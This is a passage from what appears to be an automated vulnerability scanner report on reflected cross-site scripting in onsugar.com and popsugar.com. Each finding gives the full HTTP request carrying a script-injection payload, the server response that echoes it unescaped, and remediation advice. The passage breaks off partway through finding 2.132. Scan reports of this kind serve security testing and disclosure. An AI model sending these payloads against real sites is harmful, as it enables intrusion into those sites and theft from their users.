<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4626a"-alert(1)-"62698f08092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832642%7CPlX7exM%2F2VKT4xhnnXce4TwYjmyaLu5fXuolcj%2B39sgDSw9zzrwXiF6yXituIHWATQkjYJVp9AbgdMJ6szw875Gkx%2BuAvXudo7leHhX%2F8iJMk%2BxPhd39jzHp6Hem%2FCHJbPzTI1P6Np4wskedc4UjSxjRf6D6vWf5VxS4%2Fk66DYdDvmuNF9Y8D3NTG%2BCe1AZ9tj83XQw%2Fsdfm2z17mlTlnA%3D%3D%7C32acfef3993955b12c9f4ef4b50c4912e752e802; expires=Wed, 05-Oct-2011 16:37:22 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:02 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc9e"><script>alert(1)</script>b1683b2d7ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832644%7Cio2s1Ow5Ncf%2F%2Fl6lcs9xNKXmSCTELGwjgZ%2B30%2BsL%2BBCsKQ1Lv54pc%2FiTc5iX8SFFQIvOXkLhf5bYPeelsJvscy7uLqQZebvK0VYAgwAB42NGUQCNrwF76WrK6%2BnbwWxK92zuu7fijHl8EuYS7xUwWG%2BfIx9RaVwSB%2B3C2MU6z1Qttn6Ir8ABR0cuSKocRVI68BI1Gi56KXlH5tGAHh5KIg%3D%3D%7C97a9f8778b10895f16abe7ced926ed84d50e8017; expires=Wed, 05-Oct-2011 16:37:24 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217b"-alert(1)-"1a7cc52b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832645%7CFOnqvD5UU3%2BUJgXtp2jPLd00CihayQtMbrH4XGUffzXA5zB7bhttXGMIFXU1fS1UgZz8Czaxf2aEQ7OOvGv3H5A7e2KdLho551ayNhJBe7uuasmqhM9z7eqWwr0PMT9wtID0JdyilKZu6XUoJjIKl25uXVopt2hpgs46jICOno6xXzuSlDiazg6tbKjGtziEZkG3nGgRR2hKvL7XAJWH%2BQ%3D%3D%7C670bb0a18cfd2ae29f1ecf51d7bd68f46414fc49; expires=Wed, 05-Oct-2011 16:37:25 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:05 GMT
Server: lighttpd/1.4.26
Content-Length: 8001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b281b"-alert(1)-"dce851da1d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832648%7CS1ct4OelR%2FlO6%2F4TyK3kytYnTtHD2WAkTX9w6edSBh%2BhWeYJBSuQq%2F4ZudckOlNHnYcd3Yg6YA8etZBDdntye8s%2ByoyXo1Cwwuim2ivs2IR7%2FvbA3aM29%2FBrTb3EkoCi7OP%2BqOkQFP%2Ff6%2FgXHOEkNdZlhi4HS0nAfVYjAZ3bbPKqJRJQ1wEUb3gWVsyNHOcas1yiVywhkZcrS2TMEugGrg%3D%3D%7Cb41abd34caa2ce189f969af07b306fc0a82ebb95; expires=Wed, 05-Oct-2011 16:37:28 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:08 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d58f"><script>alert(1)</script>358ef49d22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832647%7CU%2B8KzzGTQDjsyinyxAa5%2FZ2X%2BbF7Ne1pn4rOi%2FO6TkYNHR6ZyOb2a6K1KzAvYfho%2BFqPSlApJzMA1LnLKd4g2hT8Al1%2B%2BUUTxEX3QLGVI%2FVo4nzECvqe9ys%2F7kmnuItNKTr69DNqakEOSfuj5I3HkR8hUMOJJ3H3qPT5bI3kLNvxaBSuOoktB28ILYCaywW%2BkhYj72OcbewWZYoyVv0xKA%3D%3D%7C3b2fc535e94955b0ae945f747c82a641a36ca1a6; expires=Wed, 05-Oct-2011 16:37:27 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:07 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a1"-alert(1)-"c8a5c0fff23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/505a1"-alert(1)-"c8a5c0fff23?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831676%7CFWuR3rvfbbY5%2FMDWsCLoTMrE%2FIO9JaMIyUtnAkEQfmXmsJKlgNvmVB6d8yuUQtJKZt5QbQCsVFCvk7vrABwb9YS16L90KsGRkmt2iu5RQUTt%2B2X8Wx2VM%2BktODGDYumTvLgAdDZozVeZgyEbFbs6xM%2FHtEXyK3xwhgU0h%2B%2B2aXLTxDKxn6Fir8ipbCbqRgr9fm0q1TjWwitCn36M9IPJMw%3D%3D%7Ca14adba45dd6721dd7e44ec9b081d759f64dc04a; expires=Wed, 05-Oct-2011 16:21:16 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "a5109bd915fbacdba358a709224af1dd";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/505a1"-alert(1)-"c8a5c0fff23",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c964"><script>alert(1)</script>fa900ede36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964"><script>alert(1)</script>fa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; expires=Wed, 05-Oct-2011 16:21:15 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:55 GMT
Server: lighttpd/1.4.26
Content-Length: 7787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964"><script>alert(1)</script>fa900ede36&c5=&c6=&c15=a5109bd915fbacdba358a709224af1dd&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbf1"><script>alert(1)</script>0838c82964a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216779
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831683%7CW7Cc04oKuS%2FFL%2FWDuqxqWUgvLzSfjJaKze7pGoBWOfj6s2o1LE3eGfCCVh6dEpmmV2AqDKGuc4L4PrYYB9Gomsr0m%2BEcEWErb1f5kWM5HmkwZULLF3xDsI5uyNEH2Jvs%2Fl1%2Ftysqnay5H1Ze7gRVfIw0FpM90oXY%2BbhvF1KEzc%2FVlrr1qTRDS3912fXNIHvpbXKpvqVvrtRkgTfFZKpywQ%3D%3D%7Ca957e63a43c4911b378534156090709ab5a6580f; expires=Wed, 05-Oct-2011 16:21:23 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A+%5B%7B%22sugar-menu-subnav-items%22%3A+%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C+%7B%22user-feedback-div%22%3A+%22%2Fsugar-user-feedba
...[SNIP]...

2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1274b"-alert(1)-"faa5baba69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajaxharness1274b"-alert(1)-"faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
